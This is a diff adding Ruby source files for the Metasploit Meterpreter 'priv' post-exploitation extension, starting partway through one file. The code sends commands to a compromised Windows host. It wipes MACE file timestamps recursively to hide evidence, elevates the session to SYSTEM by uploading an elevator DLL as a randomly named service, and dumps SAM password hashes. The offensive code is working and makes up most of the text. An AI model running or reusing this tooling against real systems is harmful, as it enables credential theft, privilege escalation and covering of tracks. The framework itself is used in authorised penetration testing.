+	# Recursively set the MACE values to the minimum threshold for the supplied
+	# directory.
+	#
+	def blank_directory_mace(dir_path)
+		request = Packet.create_request('priv_fs_blank_directory_mace')
+		request.add_tlv(TLV_TYPE_FS_FILE_PATH, dir_path)
+		client.send_request(request)
+		true
+	end
+protected
+	attr_accessor :client # :nodoc:
+end
+end; end; end; end; end

data/lib/rex/post/meterpreter/extensions/priv/passwd.rb ADDED

@@ -0,0 +1,61 @@
+#!/usr/bin/env ruby
+module Rex
+module Post
+module Meterpreter
+module Extensions
+module Priv
+###
+#
+# This class wraps a SAM hash entry.
+#
+###
+class SamUser
+	#
+	# Initializes the class from a hash string like this:
+	#
+	# Administrator:500:aad3b435b51404eeaadfb435b51404ee:31d6cfe0d16de931b73c59d7e0c089c0:::
+	#
+	def initialize(hash_str)
+		self.user_name, self.user_id, self.lanman, self.ntlm = hash_str.split(/:/)
+		self.hash_string = hash_str
+	end
+	#
+	# Returns the hash string that was supplied to the constructor.
+	#
+	def to_s
+		hash_string
+	end
+	#
+	# The raw hash string that was passed to the class constructor.
+	#
+	attr_reader :hash_string
+	#
+	# The username from the SAM database entry.
+	#
+	attr_reader :user_name
+	#
+	# The user's unique identifier from the SAM database.
+	#
+	attr_reader :user_id
+	#
+	# The LM hash.
+	#
+	attr_reader :lanman
+	#
+	# The NTLM hash.
+	#
+	attr_reader :ntlm
+protected
+	attr_writer :hash_string, :user_name, :user_id, :lanman, :ntlm # :nodoc:
+end
+end; end; end; end; end

data/lib/rex/post/meterpreter/extensions/priv/priv.rb ADDED

@@ -0,0 +1,104 @@
+#!/usr/bin/env ruby
+require 'rex/post/meterpreter/extensions/priv/tlv'
+require 'rex/post/meterpreter/extensions/priv/passwd'
+require 'rex/post/meterpreter/extensions/priv/fs'
+module Rex
+module Post
+module Meterpreter
+module Extensions
+module Priv
+###
+#
+# This meterpreter extensions a privilege escalation interface that is capable
+# of doing things like dumping password hashes and performing local
+# exploitation.
+#
+###
+class Priv < Extension
+	#
+	# Initializes the privilege escalationextension.
+	#
+	def initialize(client)
+		super(client, 'priv')
+		client.register_extension_aliases(
+			[
+				{
+					'name' => 'priv',
+					'ext'  => self
+				},
+			])
+		# Initialize sub-classes
+		self.fs = Fs.new(client)
+	end
+	#
+	# Attempt to elevate the meterpreter to Local SYSTEM
+	#
+	def getsystem( technique=0 )
+		request = Packet.create_request( 'priv_elevate_getsystem' )
+		elevator_name = Rex::Text.rand_text_alpha_lower( 6 )
+		if( client.platform == 'x64/win64' )
+			elevator_path = ::File.join( Msf::Config.install_root, "data", "meterpreter", "elevator.x64.dll" )
+		else
+			elevator_path = ::File.join( Msf::Config.install_root, "data", "meterpreter", "elevator.dll" )
+		end
+		elevator_path = ::File.expand_path( elevator_path )
+		elevator_data = ""
+		::File.open( elevator_path, "rb" ) { |f|
+			elevator_data += f.read( f.stat.size )
+		}
+		request.add_tlv( TLV_TYPE_ELEVATE_TECHNIQUE, technique )
+		request.add_tlv( TLV_TYPE_ELEVATE_SERVICE_NAME, elevator_name )
+		request.add_tlv( TLV_TYPE_ELEVATE_SERVICE_DLL, elevator_data )
+		request.add_tlv( TLV_TYPE_ELEVATE_SERVICE_LENGTH, elevator_data.length )
+		# as some service routines can be slow we bump up the timeout to 90 seconds
+		response = client.send_request( request, 90 )
+		technique = response.get_tlv_value( TLV_TYPE_ELEVATE_TECHNIQUE )
+		if( response.result == 0 and technique != nil )
+			client.core.use( "stdapi" ) if not client.ext.aliases.include?( "stdapi" )
+			client.sys.config.getprivs
+			return [ true, technique ]
+		end
+		return [ false, 0 ]
+	end
+	#
+	# Returns an array of SAM hashes from the remote machine.
+	#
+	def sam_hashes
+		response = client.send_request(
+			Packet.create_request('priv_passwd_get_sam_hashes'))
+		response.get_tlv_value(TLV_TYPE_SAM_HASHES).split(/\n/).map { |hash|
+			SamUser.new(hash)
+		}
+	end
+	#
+	# Modifying privileged file system attributes.
+	#
+	attr_reader :fs
+protected
+	attr_writer :fs # :nodoc:
+end
+end; end; end; end; end